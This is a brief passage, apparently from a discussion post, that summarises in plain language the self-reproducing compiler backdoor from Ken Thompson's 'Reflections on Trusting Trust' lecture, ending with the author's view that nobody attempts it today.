Turing Award speech, "Reflections on Trusting Trust", he described the
following hack:
- The Unix login program is modified to allow in someone with a certain
userid and password
- The C compiler would insert this modification whenever login.c was
compiled, so compiling from a clean copy of login.c wouldn't help
- The C compiler would also insert modifications whenever it
itself was recompiled, so recompiling the C compiler would still leave
you with the Trojan in place.
There was one more step: when the compiler was asked to disassemble the
Trojaned code, it would show what the code was supposed to be,
not what it actually was.
Thompson did implement this as a demo. Nobody really thinks
anyone is trying this today.